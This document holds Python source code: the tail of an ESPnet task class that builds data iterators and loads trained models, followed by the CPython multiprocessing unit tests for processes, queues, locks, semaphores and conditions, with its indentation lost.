logging.info(f"[{name}] dataset:\n{dataset}")
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
if len(batches) < world_size:
raise RuntimeError("Number of samples is smaller than world_size")
if batch_size < world_size:
raise RuntimeError("batch_size must be equal or more than world_size")
if rank < batch_size % world_size:
batch_size = batch_size // world_size + 1
else:
batch_size = batch_size // world_size
num_cache_chunks = num_cache_chunks // world_size
# NOTE(kamo): Split whole corpus by sample numbers without considering
# each of the lengths, therefore the number of iteration counts are not
# always equal to each other and the iterations are limitted
# by the fewest iterations.
# i.e. the samples over the counts are discarded.
batches = batches[rank::world_size]
return ChunkIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
# For chunk iterator,
# --num_iters_per_epoch doesn't indicate the number of iterations,
# but indicates the number of samples.
num_samples_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
batch_size=batch_size,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
@classmethod
def build_multiple_iter_factroy(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
seed: int,
**kwargs,
):
assert check_argument_types()
assert len(data_path_and_name_and_type) > 0, len(data_path_and_name_and_type)
# 1. Sanity check
num_splits = None
for path in [path for path, _, _ in data_path_and_name_and_type] + list(
shape_files
):
if not Path(path).is_dir():
raise RuntimeError(f"{path} is not a directory")
p = Path(path) / "num_splits"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
with p.open() as f:
_num_splits = int(f.read())
if num_splits is not None and num_splits != _num_splits:
raise RuntimeError(
f"Number of splits are mismathed: "
f"{data_path_and_name_and_type[0][0]} and {path}"
)
num_splits = _num_splits
for i in range(num_splits):
p = Path(path) / f"split.{i}"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
# 2. Create functions to build an iter factory for each splits
data_path_and_name_and_type_list = [
[
(str(Path(p) / f"split.{i}"), n, t)
for p, n, t in data_path_and_name_and_type
]
for i in range(num_splits)
]
shape_files_list = [
[str(Path(s) / f"split.{i}") for s in shape_files]
for i in range(num_splits)
]
num_iters_per_epoch_list = [
(num_iters_per_epoch + i) // num_splits
if num_iters_per_epoch is not None
else None
for i in range(num_splits)
]
max_cache_size = max_cache_size / num_splits
# Note that iter-factories are built for each epoch at runtime lazily.
build_funcs = [
functools.partial(
cls.build_iter_factory,
data_path_and_name_and_type=_data_path_and_name_and_type,
shape_files=_shape_files,
num_iters_per_epoch=_num_iters_per_epoch,
max_cache_size=max_cache_size,
seed=seed,
train=train,
**kwargs,
)
for (
_data_path_and_name_and_type,
_shape_files,
_num_iters_per_epoch,
) in zip(
data_path_and_name_and_type_list,
shape_files_list,
num_iters_per_epoch_list,
)
]
# 3. Build MultipleIterFactory
return MultipleIterFactory(build_funcs=build_funcs, shuffle=train, seed=seed,)
@classmethod
def build_streaming_iterator(
cls,
data_path_and_name_and_type,
preprocess_fn,
collate_fn,
key_file: str = None,
batch_size: int = 1,
dtype: str = np.float32,
num_workers: int = 1,
allow_variable_data_keys: bool = False,
ngpu: int = 0,
inference: bool = False,
) -> DataLoader:
"""Build DataLoader using iterable dataset"""
assert check_argument_types()
if dtype in ("float32", "O0", "O1", "O2", "O3"):
dtype = "float32"
# For backward compatibility for pytorch DataLoader
if collate_fn is not None:
kwargs = dict(collate_fn=collate_fn)
else:
kwargs = {}
# IterableDataset is supported from pytorch=1.2
if LooseVersion(torch.__version__) >= LooseVersion("1.2"):
dataset = IterableESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
key_file=key_file,
)
kwargs.update(batch_size=batch_size)
else:
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
)
if key_file is None:
key_file = data_path_and_name_and_type[0][0]
batch_sampler = UnsortedBatchSampler(
batch_size=batch_size, key_file=key_file, drop_last=False,
)
kwargs.update(batch_sampler=batch_sampler)
cls.check_task_requirements(dataset, allow_variable_data_keys, inference)
return DataLoader(
dataset=dataset, pin_memory=ngpu > 0, num_workers=num_workers, **kwargs,
)
# ~~~~~~~~~ The methods below are mainly used for inference ~~~~~~~~~
@classmethod
def build_model_from_file(
cls,
config_file: Union[Path, str],
model_file: Union[Path, str] = None,
device: str = "cpu",
) -> Tuple[AbsESPnetModel, argparse.Namespace]:
"""This method is used for inference or fine-tuning.
Args:
config_file: The yaml file saved when training.
model_file: The model file saved when training.
device:
"""
assert check_argument_types()
config_file = Path(config_file)
with config_file.open("r", encoding="utf-8") as f:
args = yaml.safe_load(f)
args = argparse.Namespace(**args)
model = cls.build_model(args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
model.to(device)
if model_file is not None:
if device == "cuda":
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
device = f"cuda:{torch.cuda.current_device()}"
model.load_state_dict(torch.load(model_file, map_location=device))
return model, args
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# sometimes get p.exitcode == 0 on Windows ...
if os.name != 'nt':
self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
p.join(timeout=10)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._test_terminate)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
p.join(timeout=10)
if os.name != 'nt':
for p in procs:
self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
